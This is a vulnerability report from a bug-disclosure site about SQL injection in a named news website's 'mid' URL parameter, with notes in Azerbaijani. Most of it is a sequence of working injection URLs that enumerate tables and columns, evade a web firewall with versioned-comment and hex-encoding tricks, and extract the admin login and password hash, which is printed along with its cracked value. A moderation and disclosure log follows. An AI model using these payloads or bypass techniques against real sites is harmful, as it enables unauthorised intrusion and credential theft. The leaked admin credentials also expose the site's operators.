1. BUGemot
  2. mid Parametr Sql Injection

mid Parametr Sql Injection

aztime.az 20 June 2016, 03:50

Detailed information

http://www.aztime.az/?id=3&bid=8&mid=676' # Sql Vunl
Column Sayi 13, Datalar gelen Columnlar 3,5,8
http://www.aztime.az/?id=3'&bid=8&mid=-676' UNION SELECT 1,2,3,4,table_name,6,7,8,9,10,11,12,13 from information_schema.tables where table_schema=database()--+-' # bele olanda ilk olarag table_name de problem yaranacag cunki latin1 convert etmek lazimdir onnan sonra 406 Not Accetpt xetasi gelecey firewalli bypass etmek ucunse
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(table_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.tables*/ /*!where*/ /*!table_schema=database()*/--+-' # ekrana Admin table_name gelmelidir
Admin Table-den columnlari cekmek cun
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(column_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/ # lakin ekrana sadece ID column_name-si gelecey o biri column_name ler gelmiyecey
Login ve password olan column_name-ri tapmap ucun Like %log%(lakin %log% bu hisseni hex-lemek lazimdir ) ve Like %pas%(hemcinin %pas% buranida )
Emrinden istifade edib tapa bilerik
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(column_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/ and column_name like 0x2570617325--+-' # Loginler olan column_name "login"
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(column_name USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!information_schema.columns*/ /*!where*/ /*!table_name=0x61646d696e*/ and column_name like 0x2570617325--+-' # Passwordlar olan column_name ise pass
Indi ise columlardan dalari cekek
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(login USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!admin*/ --+-' # Login admin
http://www.aztime.az/?id=3'&bid=8&mid=-676' /*!UNION*/ /*!SELECT*/ 1,2,3,4,/*!CONVERT(pass USING latin1)*/,6,7,8,9,10,11,12,13 /*!from*/ /*!admin*/ --+-' Password ise md5 olunmush halda: 202cb962ac59075b964b07152d234b70 (hash ise 123-dur)

Comments

  • 21 October 2016, 13:52
    Vulnerability status
    Have not any information from source

  • 04 October 2016, 10:04
    Added point to Vulnerability
    For translate of bug gived 8 point to translator

  • 04 October 2016, 10:04
    Added point to Vulnerability
    For translate of bug gived 1 point to translator

  • 22 August 2016, 10:11
    Vulnerability status
    Sended e-mail to source about vulnerability

  • 21 June 2016, 13:47
    Added point to Vulnerability
    Moderator gave 8 point from 10 to vulnerability

  • 21 June 2016, 13:44
    Vulnerability status
    Confirmed by Moderator

  • 20 June 2016, 03:50
    Vulnerability added
    Vulnerability added to BUGemot